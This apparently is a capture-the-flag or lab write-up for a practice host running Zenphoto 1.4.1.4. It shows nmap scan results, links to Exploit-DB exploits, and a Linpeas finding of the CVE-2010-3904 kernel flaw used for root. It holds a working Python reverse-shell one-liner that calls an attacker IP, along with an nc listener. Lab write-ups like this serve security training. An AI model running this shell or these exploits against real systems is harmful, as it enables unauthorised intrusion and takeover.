Nmap

──(kali㉿kali)-[/home/Tools/nmapAutomator/192.168.243.41]
└─$ cat nmapAutomator_192.168.243.41_all.txt

Running all scans on 192.168.243.41

Host is likely running Unknown OS!

———————Starting Port Scan———————–

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
3306/tcp open mysql

———————Starting Script Scan———————–

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 8392abf2b76e27087ba9b872328ccc29 (DSA)
|_ 2048 6577fa50fd4d9ef167e5cc0cc696f23e (RSA)
23/tcp open ipp CUPS 1.4
|_http-server-header: CUPS/1.4
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS Detection modified to: Linux

———————Starting Full Scan————————

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
3306/tcp open mysql

No new ports

———————-Starting UDP Scan————————

PORT STATE SERVICE
5353/udp open zeroconf

Making a script scan on UDP ports: 5353

PORT STATE SERVICE VERSION
5353/udp open mdns DNS-based service discovery

Http

Given the open ports that we have and the versions running on them I am going to jump straight into port 80.

check the source code, u can know zenphoto version is 1.4.1.4

Exploitation

u can use exp-db to search “zenphoto 1.4.1.4”

https://www.exploit-db.com/exploits/18083

But,entering the shell,u will find this’s a unstable shell,so, need use python script to reverse a stable shell

export RHOST="192.168.45.227";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

rlwrap nc -lvnp 443

Privilege Escalation

Then download Linpeas.sh into target machine,and run it, find

[+] [CVE-2010-3904] rds

Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c

https://www.exploit-db.com/exploits/15285

u then executed the exploit and was able to gain a root shell.